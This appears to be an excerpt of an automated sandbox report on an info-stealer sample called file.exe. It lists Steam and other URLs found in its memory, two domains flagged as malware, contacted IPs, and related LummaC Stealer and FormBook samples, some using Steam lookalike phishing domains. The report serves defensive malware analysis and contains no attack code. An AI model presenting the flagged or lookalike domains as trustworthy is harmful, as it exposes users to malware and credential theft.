00000000.00000003.1192568093.0000000005403000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005409000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://store.steampowered.com/about/file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.cloudflare.steamstatic.com/file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://fostinjec.today:443/LksNAzffile.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          		unknown
                                                                                                                                                          https://steamcommunity.com/2file.exe, 00000000.00000002.1194679901.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193577853.0000000000B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://steamcommunity.com/profiles/76561199822375128Zfile.exe, 00000000.00000003.1164445689.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamloopback.hostfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbbfile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://help.steampowered.com/en/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/market/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://store.steampowered.com/news/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://steamcommunity.com/profiles/76561199822375128Rfile.exe, 00000000.00000002.1194679901.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193577853.0000000000B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.cloudflare.steams:file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136576601.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=file.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/sh8file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://arisechairedd.shop:443/JnsHYfile.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://steamcommunity.com/profiles/76561199822375128bfile.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_alldp.icofile.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://store.steampowered.com/stats/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://medal.tvfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vfile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://x1.c.lencr.org/0file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://x1.i.lencr.org/0file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&amp;l=enfile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pfile.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  188.114.97.3
                                                                                                                                                                                                                  		guntac.betEuropean Union
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  104.73.234.102
                                                                                                                                                                                                                  		steamcommunity.comUnited States
                                                                                                                                                                                                                  		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                  Analysis ID:1637453
                                                                                                                                                                                                                  Start date and time:2025-03-13 16:39:15 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 5m 56s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:12
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:file.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 23.60.203.209
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Execution Graph export aborted for target file.exe, PID 6392 because there are no executed function
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  11:40:15API Interceptor22x Sleep call for process: file.exe modified

                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  188.114.97.3http://sg-adh7.vv.885210.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • sg-adh7.vv.885210.xyz/favicon.ico
                                                                                                                                                                                                                  http://caixadirectasecdigital.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • caixadirectasecdigital.com/favicon.ico
                                                                                                                                                                                                                  PO NO 28950.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.tether1.xyz/focp/
                                                                                                                                                                                                                  RFQ- Italy.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                                  • www.xploitation.net/sqjz/
                                                                                                                                                                                                                  Enquiry Quote - 21834-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.joeyvv.xyz/b80n/
                                                                                                                                                                                                                  DcbI6OM1wO.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                  • ddrtot.shop/New/PWS/fre.php
                                                                                                                                                                                                                  kVPzMgJglW.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.timeinsardinia.info/j4nd/
                                                                                                                                                                                                                  tnZI8EzSx3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.braposaldesk.cyou/3it7/
                                                                                                                                                                                                                  zzSk99EqY0.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.braposaldesk.cyou/3it7/
                                                                                                                                                                                                                  hh01FRs81x.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.serenityos.dev/dntg/?R4lxS2-P=Xi77pNpzRwduTXf13DwoRl9ks24bE/OoZO8jI9GlbI12YargANeHXOwJPk3kluRPu8INtGeEgdhJoy+Tym0P0ZbjUAApu4gNis/FV3kbZJq8JK1mGA==&LL=4FHLH
                                                                                                                                                                                                                  104.73.234.102file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                    nvtoaldlrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      https://stearncommmunity.com/profiles/52829086342741Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        https://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          https://sceanmcommnunmnlty.com/sotep/aofpe/zoeprGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            http://gift50steam.com/50Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              L0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                                noypjksdaw.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                  Q6EK7dte4N.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                    x1D44JHWDf.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
